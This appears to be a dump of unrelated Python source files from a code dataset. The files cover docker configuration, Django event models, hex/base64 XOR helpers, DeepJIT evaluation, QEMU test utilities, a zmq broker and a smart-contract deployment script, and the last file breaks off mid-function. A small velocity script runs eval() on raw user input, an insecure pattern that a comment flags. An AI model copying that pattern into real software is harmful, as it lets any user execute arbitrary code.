    # Frames that don't have at least one of the fields we ask for will not be
    # included.
    print('==============================================')
    response = query(limit=limit,
                     fields=['bat', 'in_temp'],
                     tags=['serial'],
                     debug=True,
    )
    # Example 4: Get the time the frame was received by the Pi
    print('==============================================')
    response = query(limit=limit,
                     serial=408520806,
                     fields=['received'],
                     debug=True,
    )
    # Example 5: Get the battery once every hour
    response = query(limit=10,
                     serial=0x1F566F057C105487,
                     fields=['bat'],
                     interval=3600,
                     debug=True,
    )
| StarcoderdataPython |
3227654 | <gh_stars>0
import os
import tornado.options
from docker import tls
from traitlets import HasTraits, Int, Unicode, Bool, Dict
from remoteappmanager import paths
from remoteappmanager.traitlets import set_traits_from_dict
class FileConfig(HasTraits):
    """Configuration options for the application server.
    They are sourced from the configuration file.
    """
    ##########
    # Configuration file options. All of these come from the config file.
    tls = Bool(False,
               help="If True, connect to docker with tls")
    tls_verify = Bool(True,
                      help="If True, verify the CA certificate against a "
                           "known or self-signed CA certificate")
    tls_ca = Unicode("", help="Path to CA certificate for docker TLS")
    tls_cert = Unicode("", help="Path to client certificate for docker TLS")
    tls_key = Unicode("", help="Path to client key for docker TLS")
    docker_host = Unicode("", help="The docker host to connect to")
    #: Docker realm is a label added to containers started by this deployment
    #: of simphony-remote. You should change this to something unique only if
    #: your machine is already running other simphony-remote instances, all
    #: using the same docker server. Failing to do that would allow different
    #: simphony-remote instances to see (and interact with) each other's
    #: containers.
    docker_realm = Unicode(
        "remoteexec",
        help="The docker realm. Identifies which containers belong to a "
             "specific instance of simphony-remote.")
    database_class = Unicode(
        default_value="remoteappmanager.db.orm.ORMDatabase",
        help="The import path to a subclass of ABCDatabase")
    database_kwargs = Dict(
        default_value={'url': 'sqlite:///remoteappmanager.db'},
        help="The keyword arguments for initialising the Database instance")
    login_url = Unicode(default_value="/hub",
                        help=("The url to be redirected to if the user is not "
                              "authenticated for pages that require "
                              "authentication"))
    # The network timeout for any async operation we have to perform,
    # in seconds. 30 seconds is plenty enough.
    network_timeout = Int(default_value=30,
                          help="The timeout (seconds) for network operations")
    template_path = Unicode(
        default_value=paths.template_dir,
        help="The path where to search for jinja templates")
    static_path = Unicode(
        default_value=paths.static_dir,
        help="The path where to search for static files")
    ga_tracking_id = Unicode(
        help="The google analytics tracking id"
    )
    def __init__(self, *args, **kwargs):
        """Initialise trait defaults from the DOCKER_* environment variables.

        The values set here act as defaults and may later be overridden by
        parse_config().
        """
        super().__init__(*args, **kwargs)
        # Sets the default of the docker configuration options from the
        # current environment. These will possibly be overridded by
        # the appropriate entries in the configuration file when parse_file
        # is invoked
        env = os.environ
        self.docker_host = env.get("DOCKER_HOST", "")
        if self.docker_host == "":
            # Fall back to the local docker daemon socket.
            self.docker_host = "unix://var/run/docker.sock"
        # Note that definedness, not value, is considered, meaning
        # that defining DOCKER_TLS_VERIFY=0 will still evaluate to True.
        # This is consistent with both docker behavior and general shell
        # practice.
        self.tls_verify = (env.get("DOCKER_TLS_VERIFY", "") != "")
        # We don't have an envvar way of saying TLS = True, so we rely on
        # TLS_VERIFY set status
        self.tls = self.tls_verify
        cert_path = env.get("DOCKER_CERT_PATH",
                            os.path.join(os.path.expanduser("~"), ".docker"))
        self.tls_cert = os.path.join(cert_path, 'cert.pem')
        self.tls_key = os.path.join(cert_path, 'key.pem')
        self.tls_ca = os.path.join(cert_path, 'ca.pem')
        if self.tls:
            self.docker_host = self.docker_host.replace('tcp://', 'https://')
    # -------------------------------------------------------------------------
    # Public
    def parse_config(self, config_file):
        """Parses the config file, and assign their values to our local traits.
        """
        # Keep the file line parser isolated, but use the global one
        # so that we can get the help of the command line options.
        file_line_parser = tornado.options.OptionParser()
        for traitlet_name, traitlet in self.traits().items():
            # tornado.OptionParser defines an option with a Python type
            # and performs type validation.
            default_value = getattr(self, traitlet_name)
            file_line_parser.define(
                traitlet_name,
                default=default_value,
                type=type(default_value),
                help=traitlet.help)
        # Let it raise the exception if the file is not there.
        # We always want the config file to be present, even if empty
        try:
            file_line_parser.parse_config_file(config_file)
        except FileNotFoundError:
            raise tornado.options.Error(
                'Could not find specified configuration'
                ' file "{}"'.format(config_file))
        set_traits_from_dict(self, file_line_parser.as_dict())
        # NOTE(review): this rewrites the scheme when tls OR tls_verify is
        # set, while __init__ only checks tls — confirm which is intended.
        if self.tls or self.tls_verify:
            self.docker_host = self.docker_host.replace('tcp://', 'https://')
    def docker_config(self):
        """Extracts the docker configuration as a dictionary suitable
        to be passed as keywords to the docker client.
        """
        params = {}
        params["base_url"] = self.docker_host
        # Note that this will throw if the certificates are not
        # present at the specified paths.
        # Note that the tls flag takes precedence against tls verify.
        # This is docker behavior.
        params["version"] = "auto"
        if not self.tls:
            return params
        tls_kwargs = {}
        tls_kwargs["client_cert"] = (self.tls_cert, self.tls_key)
        tls_kwargs["verify"] = self.tls_verify
        if self.tls_verify and self.tls_ca:
            tls_kwargs["ca_cert"] = self.tls_ca
        params["tls"] = tls.TLSConfig(**tls_kwargs)
        return params
| StarcoderdataPython |
1677884 | <filename>eventmanagement/events/models.py
from django.db import models
# Create your models here.
# Organization Model
class Organization(models.Model):
    """An organization (company/institution) with postal address and logo."""
    # blank=True makes a field optional in forms.
    # Name of the organization
    orgName = models.CharField(max_length=200, default='', blank=True)
    # Address for the organization.
    # BUG FIX: Al1's default was previously `orgName`, i.e. the CharField
    # *instance* declared above — an invalid (non-callable, non-value)
    # default. Use an empty string like the other address lines.
    Al1 = models.CharField(max_length=100, default='', blank=True)
    Al2 = models.CharField(max_length=100, default='', blank=True)
    Al3 = models.CharField(max_length=100, default='', blank=True)
    district = models.CharField(max_length=40, default='', blank=True)
    state = models.CharField(max_length=100, default='', blank=True)
    country = models.CharField(max_length=100, default='India', blank=True)
    pinCode = models.IntegerField(default=0)
    # Logo of the organization
    logo = models.ImageField(blank=True)

    def __str__(self):
        return f"{self.orgName}"
# Organizer Model
class Organizer(models.Model):
    """A person organizing events on behalf of an Organization."""
    OrganizerName = models.CharField(max_length=100)  # Name of the organizer
    OrganizerContactNumber = models.BigIntegerField(blank=True)  # Contact Number of the organizer
    OrganizerMail = models.EmailField(blank=True)  # Email of the organizer
    OrganizerOrganization = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, blank=True)  # Organization of the organizer
    OrganizerPic = models.ImageField(blank=True)  # Profile Picture of the organizer

    def __str__(self):
        # BUG FIX: previously referenced self.Organizer, an attribute that
        # does not exist on this model (AttributeError whenever the object
        # was rendered); the name field is OrganizerName.
        return f"{self.OrganizerName}, {self.OrganizerMail}"
# Speaker Model
class Speaker(models.Model):
    """A speaker presenting at events, with social/web profile links."""
    speakerName = models.CharField(max_length=100) # Name of the speaker
    speakerPic = models.ImageField(blank=True) # Image of the speaker
    speakerLinkedIn = models.URLField(blank=True) # LinkedIn of the speaker
    speakerIG = models.URLField(blank=True) # InstaGram of the speaker
    speakerFB = models.URLField(blank=True) # FaceBook of the speaker
    speakerTwitter = models.URLField(blank=True) # Twitter of the speaker
    speakerWebSite = models.URLField(blank=True) # WebSite of the speaker
    def __str__(self):
        # Display the speaker by name.
        return f"{self.speakerName}"
# Definition of an event
class Event(models.Model):
    """A scheduled event with a speaker, time window, venue and poster."""
    eventName = models.CharField(max_length=100, default='') # Name of the Event
    eventDescription = models.TextField(max_length=1000, default='', blank=True) # Description of the event
    eventSpeaker = models.ForeignKey(Speaker, on_delete=models.DO_NOTHING, blank=True) # Speaker of the Event
    eventStartTime = models.DateTimeField(blank=True) # Start Time of the event
    eventEndTime = models.DateTimeField(blank=True) # End Time of the event
    eventVenue = models.CharField(max_length=200, blank=True) # Venue of the event
    eventURL = models.URLField(blank=True) # URL of the event
    eventPoster = models.ImageField(blank=True) # Poster image of the event
    def __str__(self):
        # Display name plus the scheduled time window.
        return f"{self.eventName}, {self.eventStartTime} to {self.eventEndTime}"
# Participant Model
class Participant(models.Model):
    """An event attendee, linked to an Organization and to Events (M2M)."""
    partName = models.CharField(max_length=100) # Name of the participant
    partOrg = models.ForeignKey(Organization, on_delete=models.DO_NOTHING, blank=True) # Organization of the participant
    partCountry = models.CharField(max_length=100) # Country of the participant
    partContact = models.BigIntegerField(blank=True) # Contact Number of the participant
    partMail = models.EmailField(blank=True) # Email of the participant
    partPic = models.ImageField(blank=True) # Profile Picture of the participant
    # Events this participant attends; reverse accessor: event.participants
    partEvents = models.ManyToManyField(Event, blank=True, related_name='participants')
    def __str__(self):
        # Display name plus organization.
        return f"{self.partName}, {self.partOrg}"
| StarcoderdataPython |
1752115 | import base64
import string
# All hex digit characters (0-9, a-f, A-F) as a set.
# NOTE(review): hexifystring() below reads cls.hexdigits rather than this
# module-level set — these helpers look like they were lifted out of a class.
hexdigits = set(string.hexdigits)
def hex2base64(hexstring):
    """Re-encode a hex string (any case) as base64 text."""
    raw = base64.b16decode(hexstring.upper())
    return base64.b64encode(raw).decode('utf-8')
def base642hex(b64string):
    """Re-encode base64 text as an uppercase hex string."""
    raw = base64.b64decode(b64string)
    return base64.b16encode(raw).decode('utf-8')
def xorhexstrings(hexstring1, hexstring2):
    """XOR two equal-length hex strings; result is uppercase, zero-padded
    to the input width."""
    assert len(hexstring1) == len(hexstring2) and len(hexstring2) % 2 == 0
    xored = int(hexstring1, 16) ^ int(hexstring2, 16)
    return format(xored, '0{}X'.format(len(hexstring2)))
def makerepeatedkey(key, textlength):
    """Repeat *key* (truncating the last repetition) so the result is
    exactly *textlength* characters long."""
    full_repeats, remainder = divmod(textlength, len(key))
    return key * full_repeats + key[:remainder]
def hexifystring(cls, mystring):
    """Return *mystring* upper-cased if all its characters are hex digits
    (per cls.hexdigits), otherwise the hex encoding of its UTF-8 bytes."""
    upper = mystring.upper()
    if set(upper) < cls.hexdigits:
        return upper
    return base64.b16encode(mystring.encode('utf-8')).decode('utf-8')
def hammingdistance(cls, string1, string2):
    """Count the differing bits between two strings after hexifying them
    with cls.hexifystring and XOR-ing via cls.xorhexstrings."""
    hex1 = cls.hexifystring(string1)
    hex2 = cls.hexifystring(string2)
    assert len(hex1) == len(hex2)
    xorint = int(cls.xorhexstrings(hex1, hex2), 16)
    # Each hex digit covers 4 bits; count the set bits of the XOR value.
    return sum(1 for i in range(4 * len(hex1)) if xorint >> i & 1)
def makeblocks(hexstring, blocksize, mustbedivisible=False):
    """Split *hexstring* into chunks of *blocksize* bytes (2*blocksize hex
    characters).

    A trailing partial chunk is silently dropped; pass mustbedivisible=True
    to assert there is none.
    """
    step = 2 * blocksize
    if mustbedivisible:
        assert len(hexstring) % step == 0
    full_chunks = len(hexstring) // step
    return [hexstring[i * step:(i + 1) * step] for i in range(full_chunks)]
class FileHelper():
    """Helpers to read whitespace-separated base64 text files.

    BUG FIX: readb64filetohex previously called BinUtils.base642hex, but no
    BinUtils name exists in this module (NameError at runtime). The
    conversion is now done inline with the base64 module.
    """
    @staticmethod
    def readb64filetohex(filename):
        """Read a base64 text file and return its content as uppercase hex."""
        with open(filename) as f:
            b64 = ''.join(f.read().split())
        return base64.b16encode(base64.b64decode(b64)).decode('utf-8')

    @staticmethod
    def readb64filetobytes(filename):
        """Read a base64 text file and return the decoded bytes."""
        with open(filename) as f:
            return base64.b64decode(''.join(f.read().split()))
1667892 | from model import DeepJIT
from utils import mini_batches_test
from sklearn.metrics import roc_auc_score
import torch
from tqdm import tqdm
def eval(labels, predicts, thresh=0.5):
    """Print accuracy, false-discovery rate, precision and recall of
    *predicts* against binary *labels* at the given threshold.

    Note: the name shadows the builtin eval(); kept for caller
    compatibility. Raises ZeroDivisionError when there are no positive
    predictions — the caller relies on catching that exception.
    """
    pairs = list(zip(labels, predicts))
    TP = sum(1 for y, p in pairs if p >= thresh and y == 1)
    FP = sum(1 for y, p in pairs if p >= thresh and y == 0)
    FN = sum(1 for y, p in pairs if p < thresh and y == 1)
    TN = sum(1 for y, p in pairs if p < thresh and y == 0)
    precision = TP / (TP + FP)
    recall = TP / (TP + FN)
    accuracy = (TP + TN) / len(labels)
    fdr = FP / (TP + FP)
    print('Test data at Threshold %.2f -- Accuracy: %.2f, False Positives: %.2f, Precision: %.2f, Recall: %.2f'
          % (thresh, accuracy, fdr, precision, recall))
def save_result(ids, labels, predicts, path):
    """Write one "<label>\t<prediction>" line per example to *path*.

    NOTE(review): *ids* is zipped but never written — the output format is
    label<TAB>prediction only; confirm downstream readers before adding ids.
    """
    lines = ['{}\t{}\n'.format(label, pred)
             for _, label, pred in zip(ids, labels, predicts)]
    with open(path, 'w', encoding='utf-8') as fh:
        fh.writelines(lines)
def evaluation_model(data, params):
    """Load a trained DeepJIT model, score the test set, and report
    threshold metrics, the saved per-example results and the AUC.

    Args:
        data: tuple of (ids, pad_msg, pad_code, labels, dict_msg, dict_code).
        params: namespace with model/runtime options (load_model,
            filter_sizes, no_cuda, ...); mutated in place below.
    """
    ids, pad_msg, pad_code, labels, dict_msg, dict_code = data
    batches = mini_batches_test(ids=ids, X_msg=pad_msg, X_code=pad_code, Y=labels)
    # Vocabulary sizes come from the dictionaries built at preprocessing time.
    params.vocab_msg, params.vocab_code = len(dict_msg), len(dict_code)
    if len(labels.shape) == 1:
        params.class_num = 1
    else:
        params.class_num = labels.shape[1]
    # set up parameters
    params.cuda = (not params.no_cuda) and torch.cuda.is_available()
    del params.no_cuda
    params.filter_sizes = [int(k) for k in params.filter_sizes.split(',')]
    model = DeepJIT(args=params)
    if torch.cuda.is_available():
        model = model.cuda()
    model.load_state_dict(torch.load(params.load_model))
    model.eval()  # eval mode (batchnorm uses moving mean/variance instead of mini-batch mean/variance)
    all_id, all_predict, all_label = list(), list(), list()
    with torch.no_grad():
        for i, (batch) in enumerate(tqdm(batches)):
            _id, pad_msg, pad_code, label = batch
            if torch.cuda.is_available():
                # NOTE(review): this assigns to the outer 'labels', not
                # 'label' — on CUDA, 'label' stays the raw batch array and
                # the FloatTensor is never used. Works by accident because
                # label.tolist() below exists on the raw array too; confirm.
                pad_msg, pad_code, labels = torch.tensor(pad_msg).cuda(), torch.tensor(
                    pad_code).cuda(), torch.cuda.FloatTensor(label)
            else:
                pad_msg, pad_code, label = torch.tensor(pad_msg).long(), torch.tensor(pad_code).long(), torch.tensor(
                    label).float()
            if torch.cuda.is_available():
                predict = model.forward(pad_msg, pad_code)
                predict = predict.cpu().detach().numpy().tolist()
            else:
                predict = model.forward(pad_msg, pad_code)
                predict = predict.detach().numpy().tolist()
            all_predict += predict
            all_label += label.tolist()
            all_id += _id
    # with open('result.txt', 'w', encoding='utf-8') as f:
    #     results = ['{}, {}\n'.format(label, predict) for label, predict in zip(all_label, all_predict)]
    #     f.writelines(results)
    # Report metrics at every 0.1 threshold; eval() raises ZeroDivisionError
    # when no prediction clears the threshold, which is reported below.
    for thresh in [i/10 for i in range(1,10)]:
        try:
            eval(all_label, all_predict, thresh=thresh)
        except Exception as identifier:
            print("No predict larger than %f" % (thresh))
    save_result(all_id, all_label, all_predict, params.load_model+'.result')
    auc_score = roc_auc_score(y_true=all_label, y_score=all_predict)
    print('Test data -- AUC score:', auc_score)
3274966 | '''
Created on 2012-01-19
@author: innovation
'''
import unittest
import numpy as np
from tests.simualtors.joint_binomial import JointSnvMixSimulator
from joint_snv_mix.counter import JointBinaryCountData, JointBinaryQualityData
from joint_snv_mix.models.joint_snv_mix import JointSnvMixModel, JointSnvMixPriors, JointSnvMixParameters
class Test(unittest.TestCase):
    # NOTE: this module is Python 2 code ("print model.params" below is a
    # print *statement*); it will not run under Python 3 unchanged.
    def test_init(self):
        """Smoke-test construction and fitting of a JointSnvMixModel."""
        # Beta priors for the three genotype classes (AA, AB, BB).
        mu = (
            {'alpha' : 100, 'beta' : 2},
            {'alpha' : 50, 'beta' : 50},
            {'alpha' : 2, 'beta' : 100}
        )
        priors = JointSnvMixPriors(mu_N=mu, mu_T=mu)
        params = JointSnvMixParameters()
        model = JointSnvMixModel(priors, params, model='jsm2')
#        sim = JointSnvMixSimulator(mu_T=[0.9, 0.3, 0.01])
#        counts, labels = sim.draw_sample(100000)
#        
#        data = [JointBinaryCountData(*x) for x in counts]
#        model.fit(data, verbose=True)
#        
#        correct = 0
#        
#        for x, t in zip(data, labels):
#            p = model.predict(x)
#        
#            l = p.index(max(p))
#            t = np.argmax(t)
#            
#            if t == l:
#                correct += 1
#        
#        print correct
#        
        print model.params
        # Fit on synthetic quality data: 100k identical sites of 100 reads.
        q = [0] * 100
        r = [1] * 100
        data = [JointBinaryQualityData(q, r, q, r) for _ in range(100000)]
        model.fit(data, verbose=True)
if __name__ == "__main__":
    # Run the test case directly; a specific test can be selected by
    # uncommenting the sys.argv override below.
    #import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| StarcoderdataPython |
# Read initial velocity v0, final velocity v1 and elapsed time t, then print
# the mean acceleration a = (v1 - v0) / t.
# BUG FIX: the first line was corrupted by dataset residue ("137638 | ")
# which made the file a syntax error.
# SECURITY NOTE: eval() on raw user input executes arbitrary code; kept only
# because this is an interactive teaching script expecting "v0,v1,t".
v0, v1, t = eval(input("enter v0,v1,t:"))
a = (v1 - v0) / t
print(a)
| StarcoderdataPython |
class Award:
    """An award won by a movie, identified by its IMDb tconst."""

    def __init__(self, tconst, Award, Year, Category):
        # Public attribute names are part of the interface; keep them as-is.
        self.tconst = tconst
        self.Award = Award
        self.Year = Year
        self.Category = Category

    def __str__(self):
        # Note: "recieved" misspelling is preserved deliberately — callers
        # may match on the exact output text.
        return ('Movie: ' + self.tconst + ', recieved a ' + self.Award +
                ' in ' + self.Year + ' in the category: ' + self.Category)

    def getAward(self):
        return self.Award

    def getYear(self):
        return self.Year

    def getCategory(self):
        return self.Category

    def gettconst(self):
        return self.tconst
| StarcoderdataPython |
3269042 | <filename>solved/67.py
#!/usr/bin/env python3
# https://projecteuler.net/problem=67
from solved import p18
# use a lambda such that the call stack
# for read_data() includes this file.
# (Deliberate choice per the note above — do not convert to a def.)
solve = lambda: p18.solve()
args = ()  # solve() takes no arguments
solution = 7273  # known answer for Project Euler problem 67
| StarcoderdataPython |
3275677 | # Test class and utilities for functional tests
#
# Copyright (c) 2018 Red Hat, Inc.
#
# Author:
# <NAME> <<EMAIL>>
#
# This work is licensed under the terms of the GNU GPL, version 2 or
# later. See the COPYING file in the top-level directory.
import logging
import os
import sys
import uuid
import tempfile
import avocado
SRC_ROOT_DIR = os.path.join(os.path.dirname(__file__), '..', '..', '..')
sys.path.append(os.path.join(SRC_ROOT_DIR, 'python'))
from qemu.machine import QEMUMachine
def is_readable_executable_file(path):
    """Return True if *path* is a regular file that is readable and
    executable by the current user."""
    if not os.path.isfile(path):
        return False
    return os.access(path, os.R_OK | os.X_OK)
def pick_default_qemu_bin(arch=None):
    """
    Picks the path of a QEMU binary, starting either in the current working
    directory or in the source tree root directory.

    :param arch: the arch to use when looking for a QEMU binary (the target
                 will match the arch given).  If None (the default), arch
                 will be the current host system arch (as given by
                 :func:`os.uname`).
    :type arch: str
    :returns: the path to the default QEMU binary or None if one could not
              be found
    :rtype: str or None
    """
    if arch is None:
        arch = os.uname()[4]
    # qemu binary path does not match arch for powerpc, handle it
    if 'ppc64le' in arch:
        arch = 'ppc64'
    relative = os.path.join("%s-softmmu" % arch, "qemu-system-%s" % arch)
    # Try the current working directory first, then the source tree root.
    for candidate in (relative, os.path.join(SRC_ROOT_DIR, relative)):
        if is_readable_executable_file(candidate):
            return candidate
    return None
def wait_for_console_pattern(test, success_message, failure_message=None):
    """
    Waits for messages to appear on the console, while logging the content

    :param test: an Avocado test containing a VM that will have its console
                 read and probed for a success or failure message
    :type test: :class:`avocado_qemu.Test`
    :param success_message: if this message appears, test succeeds
    :param failure_message: if this message appears, test fails
    """
    console = test.vm.console_socket.makefile()
    console_logger = logging.getLogger('console')
    while True:
        # Read one console line at a time and log it.
        msg = console.readline().strip()
        if not msg:
            # NOTE(review): readline() returns '' both for blank lines and
            # at EOF; if the console closes before a pattern matches, this
            # loop spins forever — confirm the VM always emits a match.
            continue
        console_logger.debug(msg)
        if success_message in msg:
            break
        if failure_message and failure_message in msg:
            console.close()
            fail = 'Failure message found in console: %s' % failure_message
            test.fail(fail)
def exec_command_and_wait_for_pattern(test, command,
                                      success_message, failure_message=None):
    """
    Send a command to the guest console (with a trailing carriage return),
    then block until *success_message* shows up in the console output,
    logging everything read. The test is marked failed if
    *failure_message* appears instead.

    :param test: an Avocado test containing a VM whose console is used
    :type test: :class:`avocado_qemu.Test`
    :param command: the command to send
    :param success_message: if this message appears, test succeeds
    :param failure_message: if this message appears, test fails
    """
    payload = (command + '\r').encode()
    test.vm.console_socket.sendall(payload)
    wait_for_console_pattern(test, success_message, failure_message)
class Test(avocado.Test):
    """Base class for QEMU functional tests.

    Provides lazily-created QEMUMachine instances (see get_vm()) and picks
    a default QEMU binary from the 'arch'/'qemu_bin' test parameters.
    """
    def setUp(self):
        # VMs created on demand, keyed by name; shut down in tearDown().
        self._vms = {}
        # Use the avocado 'arch' tag only when it is unambiguous.
        arches = self.tags.get('arch', [])
        if len(arches) == 1:
            arch = arches.pop()
        else:
            arch = None
        # Test parameters override the tag-derived default.
        self.arch = self.params.get('arch', default=arch)
        default_qemu_bin = pick_default_qemu_bin(arch=self.arch)
        self.qemu_bin = self.params.get('qemu_bin',
                                        default=default_qemu_bin)
        if self.qemu_bin is None:
            self.cancel("No QEMU binary defined or found in the source tree")
    def _new_vm(self, *args):
        # Each VM gets its own temporary socket directory.
        # NOTE(review): the mkdtemp() directory is never removed in tearDown.
        vm = QEMUMachine(self.qemu_bin, sock_dir=tempfile.mkdtemp())
        if args:
            vm.add_args(*args)
        return vm
    @property
    def vm(self):
        # Convenience accessor for the default VM.
        return self.get_vm(name='default')
    def get_vm(self, *args, name=None):
        # Return the named VM, creating it (with *args*) on first use.
        if not name:
            name = str(uuid.uuid4())
        if self._vms.get(name) is None:
            self._vms[name] = self._new_vm(*args)
        return self._vms[name]
    def tearDown(self):
        # Shut down every VM started by this test.
        for vm in self._vms.values():
            vm.shutdown()
| StarcoderdataPython |
3362299 | <reponame>bdrich/neutron-lbaas<filename>.tox/scenario/lib/python2.7/site-packages/oslo_messaging/_drivers/zmq_driver/broker/zmq_broker.py
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
from oslo_utils import excutils
from stevedore import driver
from oslo_messaging._drivers.zmq_driver.broker import zmq_queue_proxy
from oslo_messaging._drivers.zmq_driver import zmq_async
from oslo_messaging._i18n import _LE, _LI
zmq = zmq_async.import_zmq(zmq_concurrency='native')
LOG = logging.getLogger(__name__)
class ZmqBroker(object):
    """Local messaging IPC broker (nodes are still peers).

    The main purpose is to have native zeromq application.
    Benefits of such approach are following:

    1. No risk to block the main thread of the process by unpatched
    native parts of the libzmq (c-library is completely monkey-patch
    unfriendly)
    2. Making use of standard zmq approaches as async pollers,
    devices, queues etc.
    3. Possibility to implement queue persistence not touching existing
    clients (staying in a separate process).
    """

    def __init__(self, conf):
        """Create the IPC directories, matchmaker driver, ZMQ context and
        the queue proxies managed by this broker."""
        super(ZmqBroker, self).__init__()
        self.conf = conf
        self._create_ipc_dirs()
        # Matchmaker implementation is chosen via the stevedore plugin
        # named by conf.rpc_zmq_matchmaker.
        self.matchmaker = driver.DriverManager(
            'oslo.messaging.zmq.matchmaker',
            self.conf.rpc_zmq_matchmaker,
        ).driver(self.conf)
        self.context = zmq.Context()
        self.proxies = [zmq_queue_proxy.UniversalQueueProxy(
            conf, self.context, self.matchmaker)
        ]

    def _create_ipc_dirs(self):
        # Create <ipc_dir>/fanout; only report an error when the base IPC
        # directory itself is missing (an existing tree is not an error).
        ipc_dir = self.conf.rpc_zmq_ipc_dir
        try:
            os.makedirs("%s/fanout" % ipc_dir)
        except os.error:
            if not os.path.isdir(ipc_dir):
                with excutils.save_and_reraise_exception():
                    LOG.error(_LE("Required IPC directory does not exist at"
                                  " %s"), ipc_dir)

    def start(self):
        # Start every proxy thread/greenlet.
        for proxy in self.proxies:
            proxy.start()

    def wait(self):
        # Block until all proxies have finished.
        for proxy in self.proxies:
            proxy.wait()

    def close(self):
        # Stop all proxies; called on broker shutdown.
        LOG.info(_LI("Broker shutting down ..."))
        for proxy in self.proxies:
            proxy.stop()
| StarcoderdataPython |
137326 | from brownie import *
from .settings import *
from .contracts import *
from .contract_addresses import *
import time
def main():
    """Deploy and wire up a full MISO stack on the connected network.

    Deploys access controls, the token factory, the market (auction)
    templates, the liquidity launcher and the farm factory, then drives
    the MISORecipe02 helper contract through a complete prepareMiso()
    run with hard-coded demo parameters.
    """
    load_accounts()
    # Initialise Project
    operator = accounts[0]
    wallet = accounts[1]
    # GP: Split into public and miso access control
    access_control = deploy_access_control(operator)
    user_access_control = deploy_user_access_control(operator)
    # user_access_control = access_control
    # Setup MISOTokenFactory
    miso_token_factory = deploy_miso_token_factory(access_control)
    mintable_token_template = deploy_mintable_token_template()
    # Register the token template only once (id 0 means none registered yet).
    if miso_token_factory.tokenTemplateId() == 0:
        miso_token_factory.addTokenTemplate(
            mintable_token_template, {'from': operator})
    # Setup MISO Market
    bento_box = deploy_bento_box()
    crowdsale_template = deploy_crowdsale_template()
    dutch_auction_template = deploy_dutch_auction_template()
    miso_market = deploy_miso_market(
        access_control, [dutch_auction_template, crowdsale_template])
    uniswap_factory = deploy_uniswap_factory()
    # MISOLauncher
    weth_token = deploy_weth_token()
    pool_liquidity_template = deploy_pool_liquidity_template()
    miso_launcher = deploy_miso_launcher(access_control, weth_token, bento_box)
    if miso_launcher.getLiquidityTemplateIndex(0) == ZERO_ADDRESS:
        miso_launcher.addLiquidityLauncherTemplate(
            pool_liquidity_template, {"from": accounts[0]})
    # MISOFarmFactory
    masterchef_template = deploy_masterchef_template()
    farm_factory = deploy_farm_factory(access_control)
    if farm_factory.farmTemplateId() == 0:
        farm_factory.addFarmTemplate(
            masterchef_template, {"from": accounts[0]})
    # Create mintable for testing
    recipe_02 = MISORecipe02.deploy(
        miso_token_factory,
        weth_token,
        miso_market,
        miso_launcher,
        uniswap_factory,
        farm_factory,
        {"from": accounts[0]}
    )
    # recipe_02_address = web3.toChecksumAddress(0x3FD2f53bA85345E17aF41e845f1c41014962db5F)
    # recipe_02 = MISORecipe02.at(recipe_02_address)
    # Access control admin must set the smart contract roles
    # user_access_control.addSmartContractRole(recipe_02, {'from': accounts[0]})
    # Demo token/auction/launch parameters (token amounts use TENPOW18, i.e.
    # 18-decimal units; times are relative to the current chain time).
    name = "Token"
    symbol = "TKN"
    tokensToMint = 1000 * TENPOW18
    tokensToMarket = 200 * TENPOW18
    paymentCurrency = ETH_ADDRESS
    startTime = chain.time() + 50
    endTime = chain.time() + 1000
    market_rate = 100
    market_goal = 200
    launchwindow = 3 * 24 * 60 * 60
    deadline = 200
    locktime = 100
    tokensToLiquidity = 100 * TENPOW18
    # Create new Farm
    rewards_per_block = 1 * TENPOW18
    # Define the start time relative to sales
    start_block = len(chain) + 10
    dev_addr = wallet
    tokensToFarm = 100 * TENPOW18
    alloc_point = 10
    integratorFeeAccount = accounts[1]
    # Fire the whole recipe: mint the token, set up the market, the
    # liquidity launch and the farm in one transaction.
    tx = recipe_02.prepareMiso(
        name,
        symbol,
        user_access_control,
        tokensToMint,
        tokensToMarket,
        paymentCurrency,
        startTime,
        endTime,
        market_rate,
        market_goal,
        wallet,
        operator,
        deadline,
        launchwindow,
        locktime,
        tokensToLiquidity,
        rewards_per_block,
        start_block,
        dev_addr,
        tokensToFarm,
        alloc_point,
        integratorFeeAccount, {'from': accounts[0]}
    )
    time.sleep(1)
    print("tx events: " + str(tx.events))
| StarcoderdataPython |
3225639 | """Dataset creation and transformations."""
import numpy as np
import tensorflow as tf
from opennmt.utils import compat
from opennmt.utils import misc
def make_datasets(dataset_cls, filenames):
    """Creates instances of :obj:`dataset_cls`.

    Args:
      dataset_cls: A class inheriting from ``tf.data.Dataset``.
      filenames: A list of filenames or a single filename.

    Returns:
      A list of ``tf.data.Dataset`` instances if multiple :obj:`filenames` are
      passed, otherwise a single ``tf.data.Dataset``.

    Raises:
      ValueError: if :obj:`filenames` is empty.
    """
    if not isinstance(filenames, list):
        filenames = [filenames]
    elif not filenames:
        raise ValueError("At least one data file is required")

    def _build(filename):
        # Transparently enable decompression for gzip-compressed files.
        compression = "GZIP" if misc.is_gzip_file(filename) else None
        return dataset_cls(filename, compression_type=compression)

    datasets = [_build(filename) for filename in filenames]
    return datasets[0] if len(datasets) == 1 else datasets
def normalize_weights(datasets, weights=None, sizes=None):
    """Returns normalized dataset weights based on datasets sizes.

    Args:
      datasets: A list of ``tf.data.Dataset`` instances.
      weights: An optional list of dataset weights.
      sizes: The size of each dataset, if known.

    Returns:
      A normalized list of weights that can be used as sampling probabilities.

    Raises:
      ValueError: if the length of :obj:`weights` or :obj:`sizes` does not match
        the length of :obj:`datasets`.
    """
    num_datasets = len(datasets)
    if num_datasets == 0:
        return []
    if num_datasets == 1:
        return [1.0]
    if weights is None:
        # Default to uniform weighting.
        weights = [1 / num_datasets] * num_datasets
    elif len(weights) != num_datasets:
        raise ValueError(
            "Got %d datasets but %d weights" % (num_datasets, len(weights))
        )
    if sizes is None:
        sizes = [int(get_dataset_size(dataset)) for dataset in datasets]
    elif len(sizes) != num_datasets:
        raise ValueError("Got %d datasets but %d sizes" % (num_datasets, len(sizes)))
    # Weights should be normalized by the dataset size relative to the total size.
    total_size = sum(sizes)
    scaled = [weight * (size / total_size) for weight, size in zip(weights, sizes)]
